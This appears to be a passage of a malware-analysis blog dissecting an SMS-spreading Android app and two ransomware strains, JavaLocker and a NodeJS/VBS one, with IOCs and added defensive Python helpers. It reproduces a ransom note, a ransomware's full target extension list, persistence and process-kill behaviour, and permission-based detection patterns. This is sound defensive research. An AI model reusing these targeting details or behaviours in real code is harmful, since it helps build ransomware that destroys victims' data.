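    ({"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"},
     "can read incoming SMS, including one-time codes"),
    ({"android.permission.SEND_SMS"},
     "can send SMS on its own, which costs the user money"),
]

# Constructed sample manifest (assumed, not extracted from the real APK): it declares the two
# permissions the post observed, contacts first and SMS second, under a made-up package name.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.coronasafetymask">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <application android:label="Corona Safety Mask">
        <activity android:name=".MainActivity"/>
    </application>
</manifest>
"""


def declared_permissions(manifest_xml):
    """Return the set of <uses-permission android:name=...> values in a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name")
            for el in root.iter("uses-permission")
            if el.get(ANDROID_NS + "name")}


def triage_manifest(manifest_xml):
    """Summarise the package, its permissions and every suspicious combination it satisfies."""
    root = ET.fromstring(manifest_xml)
    perms = declared_permissions(manifest_xml)
    findings = [why for needed, why in SUSPICIOUS_COMBOS if needed <= perms]
    return {
        "package": root.get("package"),
        "permissions": sorted(perms),
        "findings": findings,
    }


if __name__ == "__main__":
    report = triage_manifest(SAMPLE_MANIFEST)
    print(report["package"], sorted(report["permissions"]))
    for finding in report["findings"]:
        print(" -", finding)
```

The findings are a prompt for the analyst, not a verdict: a messaging app legitimately needs both permissions, a shop front for masks does not. Feed it the AndroidManifest.xml that jadx decodes from the APK.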
<p>Below you can see the main (and only) view of the app. Questionable content, more typos... red flags everywhere, but some people might just be desperate enough to fall for it.</p>
<p><center><img alt="App" src="https://dissectingmalwa.re/img/csm-app.png"></center></p>
<p><br></p>
<p>For static analysis of the APK file I'll be using jadx-GUI. Below you can find the GitHub repository.</p>
<p><center><a href="https://github.com/skylot/jadx">github.com/skylot/jadx</a></center></p>
<p><br></p>
<p>It works very well for my purposes here, and it even has a dark mode.</p>
<p><center><img alt="Jadx Decompiler" src="https://dissectingmalwa.re/img/csm-jadx.png"></center></p>
<p><br></p>
<p>Upon tapping the <em>"Get Safety Mask"</em> button in the app it will direct you to a second website called Masksbox which might be part of a larger scam setup.</p>
<p><center><img alt="Weblink" src="https://dissectingmalwa.re/img/csm-weblink.png"></center></p>
<p><br></p>
<p>When I visited the page this morning it was displaying this downtime message. A quick check via archive.org didn't return a recent snapshot of the page.</p>
<p><center><img alt="Masksbox down" src="https://dissectingmalwa.re/img/csm-masksbox.png"></center></p>
<p><br></p>
<p>A few hours later the website was back up with a partially configured WordPress CMS. The navbar makes it quite obvious that the page is still being built.</p>
<p><br></p>
<p><center><img alt="Masksbox" src="https://dissectingmalwa.re/img/csm-maskbox.png"></center></p>
<p><br></p>
<p>Of course there can't be a malware sample without at least one funny typo. Here we can also see that the app is using the EasyPermissions wrapper library to handle contacts and SMS functionality.</p>
<p><center><img alt="Permissions Typo" src="https://dissectingmalwa.re/img/csm-perm.png"></center></p>
<p><br></p>
<p>This section of the code is responsible for reading the contents of the victim's address book and writing them to a list.</p>
<p><center><img alt="Reading Contacts" src="https://dissectingmalwa.re/img/csm-readcont.png"></center></p>
<p><br></p>
<p>Depending on the size of the contact list, it either picks a random starting index and works its way up from there if there are more than 100 contacts, or it simply sends an SMS to every contact if there are fewer than 100.</p>
<p><center><img alt="Webpage" src="https://dissectingmalwa.re/img/csm-send.png"></center></p>
<p><br></p>
<p>Lastly we can take a look at the signature of the APK. It was signed with the CN "Hemant Prajapat", but that is a fake name for sure. Other than that there's not much interesting info to get from this.</p>
<p><center><img alt="APK Signing" width="600px" height="313px" src="https://dissectingmalwa.re/img/csm-cert.png"></center></p>
<p><br></p>
<p>And that's it! In times like this it is especially important to keep your means of communication safe, so better be extra careful. Stay home, stay safe (on the interwebs) and most importantly: stay healthy (applies to you and your devices).</p>
<h2><em>IOCs</em></h2>
<h3>CoronaSafetyMask</h3>
<div class="highlight"><pre><span></span><span class="n">CoronaSafetyMask</span><span class="p">.</span><span class="n">apk</span> <span class="c1">--> SHA256: 8a87cfe676d177061c0b3cbb9bdde4cabee0f1af369bbf8e2d9088294ba9d3b1</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">24576</span><span class="p">:</span><span class="n">KjQEzqDqCXaTJwv2AbxMHKR</span><span class="o">+</span><span class="n">ZCGPEmD8oJxmLaRyiLQuZgvNwN</span><span class="p">:</span><span class="n">wqDjaNcdRNw8</span><span class="o">+</span><span class="n">xm2RFEuZgvNk</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">coronasafetymask</span><span class="p">[.]</span><span class="n">tk</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">masksbox</span><span class="p">[.]</span><span class="n">com</span>
</pre></div>
<p><br></p>
<h2>Why would you even bother?! - JavaLocker</h2>
<p>Published 2020-03-18 by f0wL (tag:dissectingmalwa.re,2020-03-18:/why-would-you-even-bother-javalocker.html)</p>
<p>Today we'll take a look at a Windows ransomware built with Java. As you might have guessed, this will get ugly and is therefore not for the faint of heart.</p>
<p>Hey there, yeah it has been a while. I've been quite busy with university stuff for the past weeks, so I'm trying to get back into the analysis/blogging thing. I've been looking for interesting/"innovative" samples that differ from the common tricks and techniques. It was unavoidable that I would sooner or later have to look at a ransomware strain written in the most beautiful programming language there is: Java. Let's get it over with.</p>
<p>This strain is without a doubt still in its testing phase, so it is possible that there will be another version of it with proper encryption routines and other fixes in the next few days.</p>
<p>JavaLocker @ <a href="https://app.any.run/tasks/a14f4d72-1628-481c-9206-1266f75d31ae/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/9cb578d8517dc1763db9351d3aa9d6958be57ac0b49e3b851f7148eee57ca18b/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/9cb578d8517dc1763db9351d3aa9d6958be57ac0b49e3b851f7148eee57ca18b">HybridAnalysis</a>
--> <code>sha256 9cb578d8517dc1763db9351d3aa9d6958be57ac0b49e3b851f7148eee57ca18b</code></p>
<p>First of all, this is the GUI that the victim is presented with after a reboot. The ransomware encrypts the files on the system without delay, but this window isn't shown immediately afterwards, so it's easily missed by sandboxes like AnyRun that don't reboot for analysis. Apart from the terrible design and English grammar there's nothing more to this screen.</p>
<p><br></p>
<p><center><img alt="GUI" width="750px" height="450px" src="https://dissectingmalwa.re/img/javalocker-gui.png"></center></p>
<p><br></p>
<p>To display the Window with the ransomnote it will copy itself to the Startup Folder.</p>
<p><center><img alt="Start Menu" src="https://dissectingmalwa.re/img/javalocker-autostart.png"></center></p>
<p><br></p>
<p>To decompile the JAR file that I pulled from AnyRun I'm using JD-GUI. To preserve the eyesight of potential readers I later opted to copy the code to a dark-mode capable text editor.</p>
<p><center><a href="https://github.com/java-decompiler/jd-gui">github.com/java-decompiler/jd-gui</a></center></p>
<p>The Ransomware implements four classes in addition to JavaFX for the GUI: </p>
<p><em>JAVABASIC</em> : Handles the core functions of the Malware.</p>
<p><em>Encryption</em> : Derives a password for the encryption routine and hashes it with MD5.</p>
<p><em>crea</em> : Writes another instance of the ransomware to the disk.</p>
<p><em>key</em> : Holds the encryption and decryption routines.</p>
<p><br></p>
<p><center><img alt="Classes" src="https://dissectingmalwa.re/img/javalocker-classes.png"></center></p>
<p><br></p>
<p>The "scanner" function looks for other drives attached to the victim's PC. One thing to take note of is that the ransomware only checks the drive letters C through H, so naming and mounting your network drives X:, Y: or Z: might actually save you to some extent.</p>
<p><center><img alt="FS Scanner" src="https://dissectingmalwa.re/img/javalocker-scanner.png"></center></p>
<p><br></p>
<p>A few things that stand out in the next screenshot: The ransomware will spare the C:\Windows path. Secondly the dropped ransomnote will be named <em>"readmeonnotepad.javaencrypt"</em> with the following content: </p>
<p><strong>"Q: What Happen to my computer?\n A:Your personal files are encrypted by javalocker!\nQ How can I recover my Files? A You need to send 300$ of bitcoins to the following adress:BAW4VM2dhxYgXeQepOHKHSQVG6NgaEb94 then contact soviet@12334@gmail.com!"</strong></p>
<p>Another interesting fact is that the wallet address mentioned in the ransomnote is just a random string (another indicator for a test build). The address format doesn't match any of the ones used in mainnet, bchtest or testnet. For the BTC mainnet it would have to start with either 1, 3 or bc1 and it also contains an illegal character ("O"). For further reference I would recommend this guide by <a href="https://allprivatekeys.com/bitcoin-address-format">AllPrivateKeys</a>.</p>
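<p>The checks described above can be automated, which is handy when an address turns up in a note and you want to know within seconds whether it is even payable. The following Python snippet is an added example, not code from the original post: it implements Base58Check decoding with the double-SHA256 checksum that legacy 1... and 3... addresses carry, reports the exact reason an address fails, and includes an encoder used only to build known-good addresses from constructed 20-byte hashes. bech32 (bc1...) addresses are recognised but not checksum-verified. The address in the block is the one quoted from the ransom note above.</p>

```python
import hashlib

# Base58 alphabet: no 0, O, I or l, which is why an "O" can never appear in a legacy address
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Version bytes of the legacy (Base58Check) address formats: (payable on mainnet?, description)
VERSIONS = {
    0x00: (True, "P2PKH mainnet (starts with 1)"),
    0x05: (True, "P2SH mainnet (starts with 3)"),
    0x6F: (False, "P2PKH testnet (starts with m or n)"),
    0xC4: (False, "P2SH testnet (starts with 2)"),
}


def _checksum(payload):
    """First four bytes of double SHA-256, the Base58Check integrity check."""
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def b58check_encode(payload):
    """Base58Check-encode version byte + hash (used here to build known-good test addresses)."""
    data = payload + _checksum(payload)
    num = int.from_bytes(data, "big")
    digits = ""
    while num:
        num, rem = divmod(num, 58)
        digits = B58_ALPHABET[rem] + digits
    leading = len(data) - len(data.lstrip(b"\x00"))   # each leading zero byte becomes a "1"
    return "1" * leading + digits


def validate_btc_address(addr):
    """Return (payable_on_mainnet, reason). The first element is None for bech32 (bc1...)
    input, which this helper recognises but does not checksum-verify."""
    if addr.startswith("bc1"):
        return (None, "bech32 address: checksum not verified by this helper")
    bad = sorted({c for c in addr if c not in B58_ALPHABET})
    if bad:
        return (False, "characters outside the Base58 alphabet: " + "".join(bad))
    num = 0
    for c in addr:
        num = num * 58 + B58_ALPHABET.index(c)
    leading = len(addr) - len(addr.lstrip("1"))
    body = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    data = b"\x00" * leading + body
    if len(data) != 25:
        return (False, "decoded to %d bytes, expected 25" % len(data))
    payload, checksum = data[:21], data[21:]
    if checksum != _checksum(payload):
        return (False, "checksum mismatch (typo or made-up address)")
    return VERSIONS.get(payload[0], (False, "unknown version byte 0x%02x" % payload[0]))


# Address quoted from the JavaLocker ransom note above
RANSOM_NOTE_ADDRESS = "BAW4VM2dhxYgXeQepOHKHSQVG6NgaEb94"

if __name__ == "__main__":
    print(RANSOM_NOTE_ADDRESS, "->", validate_btc_address(RANSOM_NOTE_ADDRESS))
```

The alphabet check fires first, so the ransom note address is rejected on the "O" alone, exactly as noted above; an address that passes the alphabet but was typed or generated carelessly is caught by the checksum instead.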
<p>The functions <em>find2</em> and <em>ret</em> are also pretty redundant, which indicates a lack of knowledge or of time spent on it.</p>
<p><br></p>
<p><center><img alt="Redundant Functions" src="https://dissectingmalwa.re/img/javalocker-redundancy.png"></center></p>
<p><br></p>
<p>Let's check which filetypes are affected at the moment. Normally these extension lists are sorted alphabetically, but this one is not. Looks like they cobbled this one together rather than using one of the premade "popular file extensions" lists.</p>
<div class="highlight"><pre><span></span><span class="ss">".accdb"</span><span class="p">,</span> <span class="ss">".pub"</span><span class="p">,</span> <span class="ss">".reg"</span><span class="p">,</span> <span class="ss">".ico"</span><span class="p">,</span> <span class="ss">".mui"</span><span class="p">,</span> <span class="ss">".onetoc2"</span><span class="p">,</span> <span class="ss">".dwg"</span><span class="p">,</span> <span class="ss">".wk1"</span><span class="p">,</span> <span class="ss">".wks"</span><span class="p">,</span> <span class="ss">".vsdx"</span><span class="p">,</span> <span class="ss">".vsd"</span><span class="p">,</span> <span class="ss">".eml"</span><span class="p">,</span> <span class="ss">".msg"</span><span class="p">,</span> <span class="ss">".ost"</span><span class="p">,</span> <span class="ss">".pst"</span><span class="p">,</span> <span class="ss">".pptx"</span><span class="p">,</span> <span class="ss">".jfif"</span><span class="p">,</span> <span class="ss">".doc"</span><span class="p">,</span> <span class="ss">".docx"</span><span class="p">,</span> <span class="ss">".xls"</span><span class="p">,</span> <span class="ss">".xlsx"</span><span class="p">,</span> <span class="ss">".ppt"</span><span class="p">,</span> <span class="ss">".ost"</span><span class="p">,</span> <span class="ss">".msg"</span><span class="p">,</span> <span class="ss">".eml"</span><span class="p">,</span> <span class="ss">".vsd"</span><span class="p">,</span> <span class="ss">".txt"</span><span class="p">,</span> <span class="ss">".csv"</span><span class="p">,</span> <span class="ss">".rtf"</span><span class="p">,</span> <span class="ss">".123"</span><span class="p">,</span> <span class="ss">".wks"</span><span class="p">,</span> <span class="ss">".pdf"</span><span class="p">,</span> <span class="ss">".dwg"</span><span class="p">,</span> <span class="ss">".onetoc2"</span><span class="p">,</span> <span class="ss">".snt"</span><span class="p">,</span> <span 
class="ss">".snt"</span><span class="p">,</span> <span class="ss">".jpeg"</span><span class="p">,</span> <span class="ss">".jpg"</span><span class="p">,</span> <span class="ss">".docb"</span><span class="p">,</span> <span class="ss">".docm"</span><span class="p">,</span> <span class="ss">".zip"</span><span class="p">,</span> <span class="ss">".7z"</span><span class="p">,</span> <span class="ss">".rar"</span><span class="p">,</span> <span class="ss">".mp4"</span><span class="p">,</span> <span class="ss">".wav"</span><span class="p">,</span> <span class="ss">".mp3"</span><span class="p">,</span> <span class="ss">".cpp"</span><span class="p">,</span> <span class="ss">".gho"</span><span class="p">,</span> <span class="ss">".iso"</span><span class="p">,</span> <span class="ss">".mui"</span><span class="p">,</span> <span class="ss">".flv"</span><span class="p">,</span> <span class="ss">".wma"</span><span class="p">,</span> <span class="ss">".key"</span><span class="p">,</span> <span class="ss">".sln"</span><span class="p">,</span> <span class="ss">".vbs"</span><span class="p">,</span> <span class="ss">".bat"</span><span class="p">,</span> <span class="ss">".cs"</span><span class="p">,</span> <span class="ss">".ini"</span><span class="p">,</span> <span class="ss">".cmd"</span><span class="p">,</span> <span class="ss">".lv"</span><span class="p">,</span> <span class="ss">".c"</span><span class="p">,</span> <span class="ss">".js"</span><span class="p">,</span> <span class="ss">".php"</span><span class="p">,</span> <span class="ss">".mp4"</span><span class="p">,</span> <span class="ss">".html"</span><span class="p">,</span> <span class="ss">".py"</span><span class="p">,</span> <span class="ss">".docb"</span><span class="p">,</span> <span class="ss">".pps"</span><span class="p">,</span> <span class="ss">".gz"</span><span class="p">,</span> <span class="ss">".gpg"</span><span class="p">,</span> <span class="ss">".xlsm"</span><span class="p">,</span> <span 
class="ss">".vmdk"</span><span class="p">,</span> <span class="ss">".vmx"</span><span class="p">,</span> <span class="ss">".pot"</span><span class="p">,</span> <span class="ss">".pps"</span><span class="p">,</span> <span class="ss">".ppsm"</span><span class="p">,</span> <span class="ss">".ppsx"</span><span class="p">,</span> <span class="ss">".ppam"</span><span class="p">,</span> <span class="ss">".potx"</span><span class="p">,</span> <span class="ss">".potm"</span><span class="p">,</span> <span class="ss">".edb"</span><span class="p">,</span> <span class="ss">".hwp"</span><span class="p">,</span> <span class="ss">".602"</span><span class="p">,</span> <span class="ss">".sxi"</span><span class="p">,</span> <span class="ss">".sti"</span><span class="p">,</span> <span class="ss">".sldx"</span><span class="p">,</span> <span class="ss">".sldm"</span><span class="p">,</span> <span class="ss">".vdi"</span><span class="p">,</span> <span class="ss">".aes"</span><span class="p">,</span> <span class="ss">".arc"</span><span class="p">,</span> <span class="ss">".paq"</span><span class="p">,</span> <span class="ss">".bz2"</span><span class="p">,</span> <span class="ss">".tbk"</span><span class="p">,</span> <span class="ss">".bak"</span><span class="p">,</span> <span class="ss">".tar"</span><span class="p">,</span> <span class="ss">".gz"</span><span class="p">,</span> <span class="ss">".backup"</span><span class="p">,</span> <span class="ss">".vcd"</span><span class="p">,</span> <span class="ss">".bmp"</span><span class="p">,</span> <span class="ss">".png"</span><span class="p">,</span> <span class="ss">".gif"</span><span class="p">,</span> <span class="ss">".raw"</span><span class="p">,</span> <span class="ss">".cgm"</span><span class="p">,</span> <span class="ss">".tif"</span><span class="p">,</span> <span class="ss">".tiff"</span><span class="p">,</span> <span class="ss">".nef"</span><span class="p">,</span> <span class="ss">".psd"</span><span class="p">,</span> <span 
class="ss">".ai"</span><span class="p">,</span> <span class="ss">".svg"</span><span class="p">,</span> <span class="ss">".djvu"</span><span class="p">,</span> <span class="ss">".m4u"</span><span class="p">,</span> <span class="ss">".m3u"</span><span class="p">,</span> <span class="ss">".mid"</span><span class="p">,</span> <span class="ss">".wma"</span><span class="p">,</span> <span class="ss">".3g2"</span><span class="p">,</span> <span class="ss">".mkv"</span><span class="p">,</span> <span class="ss">".3gp"</span><span class="p">,</span> <span class="ss">".mov"</span><span class="p">,</span> <span class="ss">".avi"</span><span class="p">,</span> <span class="ss">".asf"</span><span class="p">,</span> <span class="ss">".asf"</span><span class="p">,</span> <span class="ss">".mpeg"</span><span class="p">,</span> <span class="ss">".vob"</span><span class="p">,</span> <span class="ss">".mpg"</span><span class="p">,</span> <span class="ss">".wmv"</span><span class="p">,</span> <span class="ss">".fla"</span><span class="p">,</span> <span class="ss">".swf"</span><span class="p">,</span> <span class="ss">".wav"</span><span class="p">,</span> <span class="ss">".sh"</span><span class="p">,</span> <span class="ss">".rb"</span><span class="p">,</span> <span class="ss">".asp"</span><span class="p">,</span> <span class="ss">".php"</span><span class="p">,</span> <span class="ss">".jsp"</span><span class="p">,</span> <span class="ss">".brd"</span><span class="p">,</span> <span class="ss">".sch"</span><span class="p">,</span> <span class="ss">".dch"</span><span class="p">,</span> <span class="ss">".dip"</span><span class="p">,</span> <span class="ss">".dp"</span><span class="p">,</span> <span class="ss">".vb"</span><span class="p">,</span> <span class="ss">".vbs"</span><span class="p">,</span> <span class="ss">".ps1"</span><span class="p">,</span> <span class="ss">".asm"</span><span class="p">,</span> <span class="ss">".h"</span><span class="p">,</span> <span 
class="ss">".pas"</span><span class="p">,</span> <span class="ss">".suo"</span><span class="p">,</span> <span class="ss">".ldf"</span><span class="p">,</span> <span class="ss">".mdf"</span><span class="p">,</span> <span class="ss">".ibd"</span><span class="p">,</span> <span class="ss">".myi"</span><span class="p">,</span> <span class="ss">".myd"</span><span class="p">,</span> <span class="ss">".frm"</span><span class="p">,</span> <span class="ss">".obd"</span><span class="p">,</span> <span class="ss">".dbf"</span><span class="p">,</span> <span class="ss">".db"</span><span class="p">,</span> <span class="ss">".mdb"</span><span class="p">,</span> <span class="ss">".accdb"</span><span class="p">,</span> <span class="ss">".sql"</span><span class="p">,</span> <span class="ss">".sqlitedb"</span><span class="p">,</span> <span class="ss">".sqlite3"</span><span class="p">,</span> <span class="ss">".asc"</span><span class="p">,</span> <span class="ss">".lay6"</span><span class="p">,</span> <span class="ss">".lay"</span><span class="p">,</span> <span class="ss">".mml"</span><span class="p">,</span> <span class="ss">".sxm"</span><span class="p">,</span> <span class="ss">".otg"</span><span class="p">,</span> <span class="ss">".odg"</span><span class="p">,</span> <span class="ss">".uop"</span><span class="p">,</span> <span class="ss">".std"</span><span class="p">,</span> <span class="ss">".sxd"</span><span class="p">,</span> <span class="ss">".otp"</span><span class="p">,</span> <span class="ss">".odp"</span><span class="p">,</span> <span class="ss">".wb2"</span><span class="p">,</span> <span class="ss">".slk"</span><span class="p">,</span> <span class="ss">".dif"</span><span class="p">,</span> <span class="ss">".stc"</span><span class="p">,</span> <span class="ss">".sxc"</span><span class="p">,</span> <span class="ss">".ots"</span><span class="p">,</span> <span class="ss">".ods"</span><span class="p">,</span> <span class="ss">".3dm"</span><span class="p">,</span> <span 
class="ss">".max"</span><span class="p">,</span> <span class="ss">".3ds"</span><span class="p">,</span> <span class="ss">".uot"</span><span class="p">,</span> <span class="ss">".stw"</span><span class="p">,</span> <span class="ss">".sxw"</span><span class="p">,</span> <span class="ss">".ott"</span><span class="p">,</span> <span class="ss">".odt"</span><span class="p">,</span> <span class="ss">".pem"</span><span class="p">,</span> <span class="ss">".p12"</span><span class="p">,</span> <span class="ss">".csr"</span><span class="p">,</span> <span class="ss">".crt"</span><span class="p">,</span> <span class="ss">".pfx"</span><span class="p">,</span> <span class="ss">".der"</span>
</pre></div>
<p><br></p>
<p>This build of the ransomware uses DES via javax.crypto.Cipher to encrypt the victim's files. The Seed Value for the DES SecureRandom function is hardcoded and held in variable <em>td</em>.</p>
<p><center><img alt="Encryption / Decryption Routines" src="https://dissectingmalwa.re/img/javalocker-encdec.png"></center></p>
<p><br></p>
<p>Fellow researcher @jishuzhain found that the DES key derived from the td seed is static which should enable victims <em>affected by this exact version</em> to get their files back.</p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Simple analysis of this ransomware. <a href="https://t.co/A9zIAhryi8">pic.twitter.com/A9zIAhryi8</a></p>— onion (@jishuzhain) <a href="https://twitter.com/jishuzhain/status/1236934202429341696?ref_src=twsrc%5Etfw">March 9, 2020</a></blockquote></center></p>
<p><br></p>
<p>And this is where we come to the point of the article headline. Why would someone even bother to: 1. build a ransomware in JAVA; 2. build it from scratch, because there are, of course, open source ransomware projects on GitHub like the one below (I selected this one because it can't be directly weaponized, but you probably know my <a href="https://dissectingmalwa.re/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html">stance</a> on OSS ransomware).</p>
<p><br></p>
<p><center><a href="https://github.com/PanagiotisDrakatos/JavaRansomware">github.com/PanagiotisDrakatos/JavaRansomware</a></center></p>
<p><br></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1114</em> --> Email Collection --> Collection</p>
<p><br></p>
<h2><em>IOCs</em></h2>
<h3>Javalocker</h3>
<div class="highlight"><pre><span></span><span class="n">JAVABASIC</span><span class="p">.</span><span class="n">jar</span> <span class="c1">--> SHA256: 9cb578d8517dc1763db9351d3aa9d6958be57ac0b49e3b851f7148eee57ca18b</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">768</span><span class="p">:</span><span class="o">/</span><span class="n">OJ3GtaE64BWRRJcU99iOZlkp8DOJ3GtaE64BWRRJcU9</span><span class="o">+</span><span class="mi">0</span><span class="n">de</span><span class="p">:</span><span class="o">/</span><span class="n">O4tG4cJb9XnLDO4tG4cJD</span><span class="o">+</span><span class="mi">4</span><span class="n">e</span>
</pre></div>
<h3>Associated Files</h3>
<div class="highlight"><pre><span></span><span class="n">JAVABASIC</span><span class="p">.</span><span class="n">jar</span>
<span class="n">readmeonnotepad</span><span class="p">.</span><span class="n">javaencrypt</span>
<span class="n">DESkey</span><span class="p">.</span><span class="n">dat</span>
</pre></div>
<h2>The Opposite of Fileless Malware - NodeJS Ransomware</h2>
<p>Published 2020-01-23 by f0wL (tag:dissectingmalwa.re,2020-01-23:/the-opposite-of-fileless-malware-nodejs-ransomware.html)</p>
<p>This one is a few days old already but still worth a look. Have I mentioned that I hate JavaScript?</p><p><center><img alt="Logo" width="700px" height="400px" src="https://dissectingmalwa.re/img/node-logo.png"></center></p>
<p><br></p>
<p>This is not the first time that someone built a Ransomware Strain with NodeJS (check out this article about <a href="https://www.bleepingcomputer.com/news/security/the-new-raa-ransomware-is-created-entirely-using-javascript/">Ransom32</a> and let's not forget about <a href="https://www.bleepingcomputer.com/news/security/microsoft-spots-nodersok-malware-campaign-that-zombifies-pcs/">Nodersok</a>), but it's not an everyday sight either. This Malware Sample was first discovered by Xavier Mertens in a post to the SANS ISC Forum <a href="https://isc.sans.edu/forums/diary/Ransomware+in+Nodejs/25664/">here</a>.</p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>NodeJS Ransom @ <a href="https://app.any.run/tasks/f262f1ff-e0a2-44c2-8b6f-414b42343af4/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/90acae3f682f01864e49c756bc9d46f153fcc4a7e703fd1723a8aa7ec01b378c/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/5e3dfe020da258c17699ee7b6ca48926d04a3c26b4643d036d27363299dc3987?environmentId=100">HybridAnalysis</a>
--> <code>sha256 9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b</code></p>
<p><br/></p>
<p>The VBS "loader" is 46 KiB in size and contains 2417 empty lines before any code (which is not obfuscated at all).</p>
<p>As one of the first steps the malware downloads a distributable of NodeJS version 8.x (which is quite old). It also presents the user agent of Firefox 52.</p>
<p><center><img alt="Downloading NodeJS" src="https://dissectingmalwa.re/img/node-downl.png"></center></p>
<p><br/></p>
<p>It adds the following registry keys to gain persistence on the system. The first one runs the VBS script again (to prevent a second round of encryption it checks for <em>AppData\Local\GFp0JAk\initdone</em>, which is created once the VBS script has run to completion), the second one shows the CLI version of the ransom note prompting for the decryption key, and the last one opens the HTML ransom note.</p>
<p><center><img alt="Registry Keys" src="https://dissectingmalwa.re/img/node-reg.png"></center></p>
<p><br/></p>
<p>Because the JavaScript has to interact with the system components somehow, the criminals shipped a version of the <a href="https://www.npmjs.com/package/graceful-fs">graceful-fs</a> npm package. It is not downloaded from the Internet but rather embedded in the script itself and written to the respective files.</p>
<p>The JavaScript portion requires the following dependencies: <code>graceful-fs, crypto, path, child_process, readline, os</code></p>
<p><center><img alt="Writing Dependencies" src="https://dissectingmalwa.re/img/node-grace.png"></center></p>
<p><br></p>
<p>Up next it enters a loop to kill Microsoft Word, Excel, Outlook and AutoCAD. (It targets business PCs / workstations, but no SQL or other services, so it is likely not meant to infect servers.)</p>
<p><center><img alt="Killing processes" src="https://dissectingmalwa.re/img/node-kill.png"></center></p>
<p><br/></p>
<p>Looks like they implemented a custom password generator for testing purposes, so let's take a quick look to see how terrible it is. The length of the password is defined globally at the top of the VB script as <em>13 characters</em>. The yellow section sets the boundaries for ASCII lowercase and uppercase characters plus numbers. The variables called pCheckxxx are initialized with 0 and are used in the green section later.</p>
<p>The author is using the <strong>Randomize()</strong> function (without a defined <em>number</em>, so it is seeding off the system timer), which is a horrible way of generating "pseudo random numbers". Btw. Rnd will return a number less than one but greater than or equal to 0. If you would like to know more about the flaws of Rnd() and Randomize() you should definitely check out this article: <a href="https://www.experts-exchange.com/articles/11114/An-Examination-of-Visual-Basic%27s-Random-Number-Generation.html">Link</a>. Moving on to the red section we can see how they choose their characters for lowercase, uppercase and the numbers. Funnily enough they defined an ASCII range for special characters as well but don't actually end up using it at all (which means less entropy, yay).</p>
<p>Lastly the green section checks for at least one uppercase letter, one lowercase letter and one digit in the password; otherwise it discards it and starts over.</p>
<p><center><img alt="Password Generation Routine" src="https://dissectingmalwa.re/img/node-pwgen.png"></center></p>
<p><br/></p>
<p>As I already mentioned this password generator was only used for testing purposes since the function call in the VB script has been commented out. This would have been a fun little exercise to bruteforce :D Never use Rnd() for crypto operations kids!</p>
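<p>To make the "never use Rnd() for crypto" point concrete, here is an added Python model of the generator's structure (it is not code from the post or from the malware). Python's <code>random.Random</code> stands in for VB's Rnd(); the actual VB6 algorithm is not reproduced, and the 1/100 s timer resolution used in the demo is an assumption for illustration only. The point it shows: with a timer-seeded PRNG the effective keyspace is the seed space, not 62^13, while the same policy with <code>secrets</code> keeps the nominal 77 bits.</p>

```python
import math
import random
import secrets
import string

PASSWORD_LENGTH = 13   # hard-coded at the top of the VB script
# The script reserves ASCII ranges for lowercase, uppercase and digits;
# the special-character range it defines is never used, so neither do we.
ALPHABET = string.ascii_lowercase + string.ascii_uppercase + string.digits


def has_all_classes(pw: str) -> bool:
    """The 'green section' check: one lowercase, one uppercase, one digit."""
    return (any(c.islower() for c in pw)
            and any(c.isupper() for c in pw)
            and any(c.isdigit() for c in pw))


def weak_generate(seed) -> str:
    """Randomize()/Rnd()-style generation, modelled with random.Random.

    ASSUMPTION: random.Random stands in for VB's Rnd(); the VB6 algorithm
    itself is not reproduced. What matters is the structure: every character
    is a pure function of one seed, so the seed *is* the password.
    Int(Rnd * 62) in VB becomes int(rng.random() * 62) here (Rnd is in [0, 1)).
    """
    rng = random.Random(seed)
    while True:
        pw = "".join(ALPHABET[int(rng.random() * len(ALPHABET))]
                     for _ in range(PASSWORD_LENGTH))
        if has_all_classes(pw):          # otherwise discard and start over
            return pw


def strong_generate() -> str:
    """Same policy, but every character comes from the OS CSPRNG."""
    while True:
        pw = "".join(secrets.choice(ALPHABET) for _ in range(PASSWORD_LENGTH))
        if has_all_classes(pw):
            return pw


def nominal_entropy_bits() -> float:
    """What 13 characters from 62 symbols are worth if chosen uniformly."""
    return PASSWORD_LENGTH * math.log2(len(ALPHABET))


def effective_entropy_bits(seed_space: int) -> float:
    """A seeded PRNG cannot emit more distinct passwords than it has seeds."""
    return min(nominal_entropy_bits(), math.log2(seed_space))


def count_distinct(seed_count: int) -> int:
    """Distinct passwords produced by a range of seeds (never more than seed_count)."""
    return len({weak_generate(s) for s in range(seed_count)})


if __name__ == "__main__":
    print("same seed, same password:", weak_generate(42) == weak_generate(42))
    print(f"nominal entropy: {nominal_entropy_bits():.1f} bits")
    # ASSUMPTION for illustration: a timer read at 1/100 s resolution over one day
    print(f"bounded by a timer seed of 8.64M values: "
          f"{effective_entropy_bits(86_400 * 100):.1f} bits")
    print("CSPRNG version:", strong_generate())
```

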